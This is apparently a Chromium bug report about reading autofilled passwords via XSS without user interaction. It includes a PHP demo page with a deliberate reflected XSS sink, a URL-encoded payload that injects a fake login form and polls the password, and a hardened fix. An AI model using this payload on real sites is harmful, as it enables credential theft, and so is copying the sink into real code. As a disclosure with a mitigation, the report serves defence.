Security: User Password Leakage from Password Manager by XSS without User Interation
Reported by har...@gmail.com, Jan 17 2017
Issue description

VULNERABILITY DETAILS

It seems Chrome prohibits getting the user's password from the password manager by XSS. When a malicious script tries to read the password field, it returns a blank value even if the field looks filled by the password manager. After a user operation, such as a key press or a click on any HTML element, the script can get the password filled by the password manager.

However, when the user moved to the XSSed page by using JavaScript, for example by using location.href, a malicious script can get the password without any user operation. It seems that the security restriction of the password manager is bypassed. I think this should be fixed because it is similar to the issue below:

https://finnwea.com/blog/stealing-passwords-from-mcdonalds-users

VERSION

Chrome Version: 55.0.2883.87 m
Operating System: Windows7 SP1 and OS X 10.11.6

REPRODUCTION CASE

I put a demonstration on my server: http://133.242.134.241/exploit/chrome_password_manager.php

The source of this PHP is below:

    <body>
    <?php
    // First visit: show a login form so the password manager offers to save credentials.
    // (Array access uses [] here; the original {} syntax was removed in PHP 8.)
    if (!isset($_GET["xss"]) && !isset($_POST["pass"])) { ?>
    Please submit id/pass to use password manager.
    <form action="?" method="post">
    <input name="id"><br>
    <input type="password" name="pass">(use dummy password)<br>
    <input type="submit">
    </form>
    <?php } else { ?>
    Please click below to fire XSS.<br>
    <a href="?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27">a tag (does not work without user operation)</a><br>
    <a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec.cgi%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=login_id%3E%3Cinput%20type=password%20name=password%3E%27%3bi=setInterval(function(){p=document.forms[0].password.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">location.href (works without user operation)</a>
    <script>
    // Reflected, unencoded query parameter inside a JavaScript string: this is the XSS sink.
    var a='<?php echo $_GET["xss"] ?>';
    </script>
    <?php } ?>
    </body>

Best regards,
Haru
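As an added example that is not part of the report, here is a hardened form of the reflection point `var a='<?php echo $_GET{"xss"} ?>';` from the reproduction case above. Since the browser-side gatekeeper only delays exposure of the autofilled value (and the location.href flow in the report walks around it), the mitigation that actually matters is preventing the XSS with context-correct output encoding plus a nonce-based CSP; the parameter name and nonce handling below are assumptions.

```php
<?php
// Added example (not the reporter's code): hardened form of the page's
//   var a='<?php echo $_GET{"xss"} ?>';
// Assumes the same "xss" query parameter name as the reproduction case.
$param = (isset($_GET["xss"]) && is_string($_GET["xss"])) ? $_GET["xss"] : "";

// Per-response nonce: only the <script> element the server emits with this
// nonce may execute, so script elements injected into the page are refused.
$nonce = base64_encode(random_bytes(16));
header("Content-Security-Policy: script-src 'nonce-$nonce'; object-src 'none'; base-uri 'none'");

// Encode for a JavaScript string context. The JSON_HEX_* flags turn ' " < > &
// into \uXXXX escapes, so the value can neither close the string literal nor
// terminate the <script> element ("/" is escaped as "\/" by default as well).
$jsLiteral = json_encode($param, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
if ($jsLiteral === false) {
    // Invalid UTF-8 in the input: emit an empty string rather than raw bytes.
    $jsLiteral = '""';
}
?>
<script nonce="<?= htmlspecialchars($nonce, ENT_QUOTES, 'UTF-8') ?>">
  var a = <?= $jsLiteral ?>;
</script>
```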
Jan 17 2017
Jan 18 2017
Thank you for your confirmation. I understand this is by design. I think that Chrome users who use the password manager must know this risk. Could you please change the permission of this ticket from Restrict to Public?
Jan 18 2017
Jan 19 2017
> I'm not aware of any attempt to prevent reading of an autofilled
> password field from JavaScript

I was mistaken. This does exist, but it's trivially circumvented. The class in question is PasswordValueGatekeeper, found in password_autofill_agent.h. The remainder of the remark is correct, however (this isn't intended or effective as a mitigation against XSS).
May 25 2017
Issue 726309 has been merged into this issue.
Comment 1 by elawrence@chromium.org, Jan 17 2017